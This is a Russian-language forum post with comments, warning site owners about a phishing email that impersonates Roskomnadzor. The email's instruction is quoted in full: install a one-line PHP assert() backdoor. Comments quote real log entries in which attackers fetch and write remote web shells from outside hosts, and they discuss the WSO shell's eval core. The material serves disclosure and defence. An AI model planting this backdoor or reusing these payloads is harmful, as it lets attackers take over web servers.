Пользователь
0,0
рейтинг
27 августа 2015 в 01:21

Разработка → Необычный развод под видом Роскомнадзора

Пост-предостережение, так как развод очень необычный и создан на волне блокировок Роскомнадзором.

Я думаю, что многие слышали, что Роскомнадзор в последнее время набрал много сотрудников, которые ищут в интернете запрещенную информацию и блокируют страницы в интернете. Параллельно с этим Роскомнадзор формирует «реестр организаторов распространения информации» (закон о блогерах). О внесении Хабра в этот список было объявлено 25 сентября 2014 года.



В любом случае Роскомнадзор заработал себе не очень хорошую репутацию и уверен, что владельцы сайтов бояться попасть в какой-нибудь список этой организации.

Сегодня моя хорошая знакомая прислала мне письмо в котором было написано, что её сайт с относительно небольшой посещаемостью внесен в этот реестр.


Текст письма ниже, орфография и пунктуация сохранены.
Здравствуйте.

Вы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени www.yandex.ru в сети «Интернет».

В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ «О внесении изменений в Федеральный закон „Об информации, информационных технологиях и о защите информации“ и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 2­1618/2015, Ваш сайтwww.yandex.ru был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».

Для идентификации Вас, как администратора доменного имени www.yandex.ru, Вам необходимо:

1. Cоздать в корневой директории Вашего сайта папку reestr
2. Cоздать в данной папке файл reestr-id198617.php, содержащий следующий текст:

< ?php
/*Подтверждение доменного имени www.yandex.ru*/
assert(stripslashes($_REQUEST[roskomnadzor]));
?>

*В < ?php необходимо убрать пробел между < и ?php
Путь до файла на Вашем сайте должен получиться следующий: www.yandex.ru/reestr/reestr-id128032.php

Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени www.yandex.ru, следую инструкции указанной выше, то Ваш сайт www.yandex.ru будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.

— С уважением,
ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ КОММУНИКАЦИЙ.


Уверен, что многим стало ясно, что это развод, однако мошенники сделали все, чтобы не сильно продвинутые пользователи выполнили действия по инструкции: письмо пришло с адреса zapret-info@roskomnadzor.org, поэтому неграмотный пользователь может подумать, что ему действительно написали из этой организации. При переходе на адрес roskomnadzor.org пользователя перекидывает на rkn.gov.ru что создает иллюзию реального сайта и домена. Домен roskomnadzor.org был зарегистрирован 6 дней назад.



Много действий от пользователя не нужно: создайте директорию, файл, напишите в этом файле одну строку.

Развод заключается в том, что пользователю предлагают создать файл с на первый взгляд безобидным php кодом. Однако, если посмотреть описание функции assert, то сразу станет ясно, что злоумышленники просто выполнят код, который будет указан в переменной roskomnadzor.
Леонид @leonid239
карма
82,0
рейтинг 0,0
Пользователь
Реклама помогает поддерживать и развивать наши сервисы

Подробнее
Реклама

Самое читаемое Разработка

Комментарии (36)

  • +15
  • +7
    Honeypot можно сделать и понять, ради чего они это делают.
  • –32
    >> Путь до файла
    Это украинец, русский написал бы «путь к файлу»…
    • +44
      Та шо те шо другие то так то сяк пишут.
      • +8
        «Шо те и шо другие» может и пишут.
        Мне как украинцу, прожившему 10 лет в рф в глаза всеравно бросается. Взаимопроникновение обычно ограничивается приграничными областями, так что всёравно — палево.
        И кстати стиль письма, такие вот «суржиковые» оговорки и речевые обороты могут использоваться для дальнейшего поиска и идентификации атакующего. Так что господа хакеры — пользуйтесь спеллчекером.

        • +2
          Немножко не в тему, но я узнал о слове «суржик» буквально месяц назад.
          Теперь оно преследует меня по интернету. Что-то не так.
          • +2
            Посмотри «Бобро поржаловать»
          • +2
            Эффект Баадера-Майнхофа
        • +1
          Я бы написал «путь до файла», ни разу не украинец и живу очень далеко от границы.
    • +1
      yandex.ru:
      путь до файла — 43 млн. ответов
      путь к файлу — 27 млн. ответов
      • +3
        google.com
        путь к файлу — About 43,600,000 results (0.20 seconds)
        путь до файла — About 623,000 results (0.26 seconds)
    • +1
      Откуда это недружелюбность между народами и разные такие намеки, — Вы либо слишком много телевизор смотрите, либо политики из СМИ перечитали. Разницы нет, хоть ты негр будешь, все равно найдутся нечестные люди, кто захочет воспользоваться твоими слабостями… а национальность тут не причем (равно как возраст, пол и вероисповедание и др.).

      И услышал казак:
      «Ты идешь воевать
      за народную власть
      со своим же народом!»
      Бывший подъесаул (Тальков Игорь)

      P.S. Роскомнадозор рассылку ведет с адреса: Роскомнадзор <zapret-info-out@rkn.gov.ru>

      P.P.S. Возможный текст письма:
      Направляется уведомление о внесении в «Единый реестр доменных имен, указателей страниц сайтов в сети «Интернет» и сетевых адресов, позволяющих идентифицировать сайты в сети «Интернет», содержащие информацию, распространение которой в Российской Федерации запрещено» следующего(их) указателя (указателей) страницы (страниц) сайта в сети «Интернет»: /какая то ссылка/.

      В случае непринятия провайдером хостинга и (или) владельцем сайта мер по удалению запрещенной информации и (или) ограничению доступа к сайту в сети «Интернет», будет принято решение о включении в единый реестр сетевого адреса, позволяющего идентифицировать сайт в сети «Интернет», содержащий информацию, распространение которой в Российской Федерации запрещено, а доступ к нему будет ограничен.

      Сведения о включении доменных имен, указателей страниц сайтов сети «Интернет» и сетевых адресов доступны круглосуточно в сети «Интернет» по адресу eais.rkn.gov.ru.

      С уважением,
      ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ КОММУНИКАЦИЙ.

      • 0
        А где вы недружелюбность увидели? Человек просто заподозрил (небезосновательно), что это украинец. Недружелюбность проявляют те, кто ему минусов накидали…
  • +3
    Нужно было разместить этот файл, но код поменять таким образом, чтобы вместо уязвимости он сохранял IP и другие данные злоумышленника. И если он не использует прокси и тд., то можно будет в какой-то степени его сдеанонить и уже с его данными написать заявление.
  • 0
    получил такое письмо сегодня ;-))
    про развод понял сразу (ну не дотягивает посещение до 3000 уников) — но подход ребята выбрали оригинальный ;-))
  • +3
    Письмо не приходило, но еще вчера, на всякий случай, настроил редирект для этого адреса на natribu.org
    Сегодня в логах нашел:

    access.log:77.221.130.49 — - [27/Aug/2015:07:50:09 +0300] «GET /reestr/reestr-id128032.php?roskomnadzor=print-439573653*57; HTTP/1.1» 301 184 "-" "-" «77.221.130.49»

    access.log:178.132.201.92 — - [27/Aug/2015:08:07:26 +0300] «GET /reestr/reestr-id128032.php?roskomnadzor=print-439573653*57; HTTP/1.1» 301 184 "-" "-" «178.132.201.92»

    access.log:5.101.156.31 — - [27/Aug/2015:08:08:09 +0300] «GET /reestr/reestr-id128032.php?roskomnadzor=print-439573653*57; HTTP/1.1» 301 184 "-" "-" «5.101.156.31»

    access.log:62.113.86.40 — - [27/Aug/2015:09:02:50 +0300] «GET /reestr/reestr-id128032.php?roskomnadzor=print-439573653*57; HTTP/1.1» 301 184 "-" "-" «62.113.86.40»

    access.log:78.108.80.142 — - [27/Aug/2015:09:09:13 +0300] «GET /reestr/reestr-id128032.php?roskomnadzor=print-439573653*57; HTTP/1.1» 301 184 "-" "-" «78.108.80.142»
    • 0
      В более ранней теме писали про запрос phpinfo()… Возможно, кто-то уже решил просканировать рунет и подсчитать попавшихся.
      • 0
        Да, это уже сторонний ботнет начал сканировать уязвимости — в гугле по запросу «print-439573653*57» находится много интересного.
  • +1
    Нарыть бы хороший эксплоит-пак да отдать. Вдруг сработает.
  • +3
    Хм, интересно. Злоумышленниками предполагается, что сайт сделан на php, и других технологий не существует в природе.

    А их можно как-нибудь наказать? Во времена диалапа по этой ссылке выложили бы своп для скачки. Вот что-нибудь в этом роде.
    • +3
      Я уже и забыл о таких способах «казни». Можно ещё из /dev/random читать. :)
    • +2
      Вот что-нибудь в этом роде.
      /dev/urandom отдать, пусть качают :)
    • +4
      Сегодня, я думаю, свопу для скачки только обрадуются. Там можно много данных выудить… :)
    • 0
      > Злоумышленниками предполагается, что сайт сделан на php, и других технологий не существует в природе.
      Даже если сайт сделан не на php, компилятор php всё равно включён по умолчанию в большинстве unix-like систем.
      Расчёт верный.
      • 0
        Эм, перечилите 5 таких систем пожалуйста, я только на макоси видел.
  • –2
    Добавьте в пост признаки того, что это развод. Мало ли кто получит такое письмо и из поисковика на этот пост придёт, пусть полезная информация будет.
    • +3
      Так в заголовке же написано: Необычный развод под видом Роскомнадзора
  • +4
    Пытались так развести… вот что удалось узнать (пост на Хабре прочитал после изысканий):
    после включения логирования переменной $_REQUEST по адресу uralpolit.ru/reestr/reestr-id128032.php (предупреждение: без проверочного roskomnadzor идет нецензурщина) идет проверочная команда: roskomnadzor=print-439573653*57; причем с разных ip адресов (если интересно могу выложить список). как только было съимитировано исполнение на стороне сервера ;), а имнно отдача результата −25055698221 появились запросы поинтереснее: assert(file_get_contents(«5.9.164.145/~users700/ac/u/1.txt»)); по указанному адресу еще обертка с контентом file_put_contents('2.php', file_get_contents('http://5.9.164.145/~users700/ac/u/2.txt')); Ну а зхдесь уже сам шелл ;) 5.9.164.145/~users700/ac/u/2.txt
    p.s. буду очень благодарен за инвайт на хабр
    • 0
      Если расшифровать код по ссылке, то за парой реплейсов и декодом код дальше не обфусцирован, беглый осмотр говорит о сборе системной инфы — какие модули БД стоят, сколько есть места на диске и прочее подобное
    • 0
      Внутри файла используется авторизация по паролю (md5 пароля захардкожен), пароль до md5 — «functionderty»
      • 0
        это именно шелл… например в теле функции есть исполнение переменной, полученной из POST:
        function actionPhp() { 
            //... 
            eval($_POST['p1']);
            //...
        }
        

        ну и если исполнить там куча формочек в том числе и для сбора инфы и выполнения различных действий на сервере
        • +1
          ps это известный шелл wso версии 2.5 (в коде define('WSO_VERSION', '2.5');)
  • 0
    У меня вот в что в лог попало:
    {«request»:{«roskomnadzor»:«copy('http://ewgames.gq/123.txt','/var/www/1123.php');»}
    с 79.105.98.88
  • +2
    https://gist.github.com/EugZol/4b0023b750368d8f1f6b — расшифрованная версия шелла для интересующихся
  • +2
    FAIL. Ведь всем же известно, что роскомнадзор не присылает уведомлений.
  • 0
    Когда увидел КПДВ, захотелось написать статью для бложека, сочетающую все «плюсы» с диаграммы.

Только зарегистрированные пользователи могут оставлять комментарии. Войдите, пожалуйста.